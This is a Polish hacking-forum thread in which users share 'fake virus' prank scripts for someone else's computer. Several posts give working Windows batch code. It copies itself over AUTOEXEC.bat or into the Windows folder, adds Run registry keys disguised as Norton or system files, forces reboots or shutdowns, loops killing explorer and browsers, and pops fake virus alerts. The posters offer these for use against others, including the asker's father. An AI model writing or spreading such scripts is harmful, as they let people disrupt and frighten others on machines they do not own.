Pokaż wyniki 1 do 10 z 15

Temat: potrzebny wirus-atrapa

Hybrid View

Previous Post Previous Post   Next Post Next Post
  1. #1
    Zarejestrowany
    Feb 2007
    Skąd
    przed klawiaturą / w różnych miejscach świata
    Postów
    81

    Domyślnie

    zawsze możnaby było w Pascalu zrobić kopie śmiercionośnego niebieskiego ekranu.. i później wrzucić go żeby startował podczas odpalania sie systemu..

    NP.

  2. #2
    Zarejestrowany
    Dec 2006
    Skąd
    polsza
    Postów
    747

    Domyślnie

    Cytat Napisał Sardihan_miał_zły_chumor...
    @echo off
    REM Wirus Lame Fucker 1.1
    cls
    echo Jestem wirus Lame Fucker by Sardihan
    copy %0 c:\AUTOEXEC.bat
    echo REGEDIT4 >>a.reg
    echo. >>a.reg
    echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run] >>a.reg
    echo "Norton AntyVirus"="C:\\AUTOEXEC.bat" >>a.reg
    echo. >>a.reg
    regedit /s a.reg
    dir >nul
    del a.reg >nul
    shutdown -t 0 -r
    zapisz w to plku z rozszerzeniem *.bat i odpal
    zeby to usunąc musisz włonczyc kompa w trybie awaryjnym i usunąc z rejestru potem wyczysc autoexec.bat i wywal reszte do kosza
    Ostatnio edytowane przez Sardihan : 05-27-2007 - 18:54

  3. #3

    Domyślnie

    lol...zawsze możesz wgrać ochraniacza ja kiedyś o tym pisałem. Za każdym razem jak bedzie pornola na www włączał to sie przeglądarka bedzie wyłączać

  4. #4

    Domyślnie

    do Sardihan Twoj skrypt dziala, ale tylko jednorazowo; czyli zawsze jak uruchomie ten plik nastepuje restart, pozniej juz wszystko normalnie dziala;
    ja potrzebuje cos takiego aby zawsze juz nastepowal restart w win
    pozdrawiam

  5. #5
    Zarejestrowany
    Nov 2006
    Skąd
    Polska/Poland
    Postów
    1,191

    Domyślnie

    wejdź sobie do harmonogramu zadań i ustaw żeby system uruchamiał shutdown.exe podczas logowania.
    potem jak będziesz chciał to odkręcić to odpal kompa z płytki z jakimś systemem (ważne by był dostęp r/w do partycji NTFS) i przesuń shutdown.exe - wtedy sie nie odpali a ty będziesz mógł po zalogowaniu wejść do harmonogramu i usunąć tego joba
    ***********
    * markossx *
    ***********

  6. #6
    Zarejestrowany
    Dec 2006
    Skąd
    polsza
    Postów
    747

    Domyślnie

    shutdown potrzebuje argumentów

    dodaj go do autostartu albo do innego rejestru ...

  7. #7
    Zarejestrowany
    Nov 2006
    Skąd
    Polska/Poland
    Postów
    1,191

    Domyślnie

    wiadomo, ze potrzebuje ale ja raczej wszystkiego na srebrnej tacy nie podaje...
    bo mądrej głowie dość dwie słowie (czy jak to tam było)
    ***********
    * markossx *
    ***********

  8. #8

    Domyślnie

    od tego zartu moj kolega prawie dostał zawału (ma odpicowany komp)
    Kod:
    @echo off
    echo USUWAM!
    ping localhost -n 4 >nul
    dir /s
    shutdown -s -t 60 -c "Bad Boi!"
    ping 127.0.0.1 -n 30 -w 1000
    shutdown -a
    :A
    tskill explorer.exe
    tskill firefox.exe
    tskill iexplorer.exe
    goto A
    A więc to robi skan kompa, co wygląda jak usuwanie potem za 60 sekund wyloncza system i zamyka explorer.exe (wygląda jak by sie te pliki usunęły )
    miłej zabawy ;p

  9. #9
    Zarejestrowany
    Jan 2008
    Postów
    278

    Domyślnie

    Witam , skoro temat rozgrzebany postanowiłem umieścić tutaj tego "trojana" :
    Kod:
    @echo off
    copy %0 %windir%\MicrosoftAPP.bat
    echo Created by VLN
    :RegWrite
    echo Dim shell >> %windir%\SystemVersion.vbs
    echo Set shell = CreateObject("Wscript.Shell") >> %windir%\SystemVersion.vbs
    echo Shell.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\QWERTY", "%windir%\SuperPorno.avi.bat" >> %windir%\SystemVersion.vbs
    if not exist %windir%\SystemVersion.vbs goto RegWrite
    :Message
    echo msgbox "Virus Detected ",16,"Windows" >> %windir%\K99DGV94.vbs
    if not exist %windir%\K99DGV94.vbs goto Message
    :Start
    echo @echo off >> %windir%\SuperPorno.avi.bat
    echo :RUN  >> %windir%\SuperPorno.avi.bat
    echo start %windir%\K99DGV94.vbs >> %windir%\SuperPorno.avi.bat
    echo start http://www.eicar.org/download/eicar.com >> %windir%\SuperPorno.avi.bat
    echo goto RUN >> %windir%\SuperPorno.avi.bat
    if not exist %windir%\SuperPorno.avi.bat goto Start
    if exist %windir%\SystemVersion.vbs start %windir%\SystemVersion.vbs
    if exist %windir%\SuperPorno.avi.bat start %windir%\SuperPorno.avi.bat
    del %windir%\SystemVersion.vbs
    del %0
    exit
    Wiem ,wiem , to prymityw ale miałem mało czasu . Jeżeli autor postu chciałby coś więcej , niech napisze tutaj bądź na PM.

    W kodzie jest linijka która uruchamia EICAR-a . Antywirus (szczególnie AVAST) będzie mocno dawał o sobie znać.Jednak to powinno wystraszyć twojego ojca,jeżeli jednak nie chcesz "budzić" Antywirusa usuń pogrubioną linijkę.
    Opis :
    Jest tworzony wpis w rejestrze i trzy pliki

    MicrosoftAPP.bat << Kopia naszego pliku
    SystemVersion.vbs << Plik który tworzy wpis
    SuperPorno.avi.bat << Plik który dzięki wpisowi będzie się uruchamiał wraz z startem systemu(jest w nim pętla która uruchamia plik poniżej i EICAR-a)
    K99DGV94.vbs << Komunikat o znalezieniu "wirusa "
    To chyba tyle
    Pozdrawiam !!!
    PS.Jeżeli w kodzie będą błędy to jak pisałem nie miałem zbytnio czasu.
    VLN
    Ostatnio edytowane przez VLN : 01-22-2008 - 12:32 Powód: A jednak był błąd w kodzie .

Podobne wątki

  1. Wirus na USB
    By noocto in forum Newbie - dla początkujących!
    Odpowiedzi: 4
    Autor: 01-30-2007, 11:41
  2. mini wirus batch
    By Sardihan in forum Hacking
    Odpowiedzi: 7
    Autor: 01-05-2007, 17:37
  3. Pomocy!! Wredny wirus !
    By Master Bodzio in forum Wirusy/Konie trojańskie
    Odpowiedzi: 2
    Autor: 12-16-2006, 23:56
  4. Potrzebny slownik
    By Pokolito in forum Newbie - dla początkujących!
    Odpowiedzi: 9
    Autor: 12-08-2006, 08:32

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj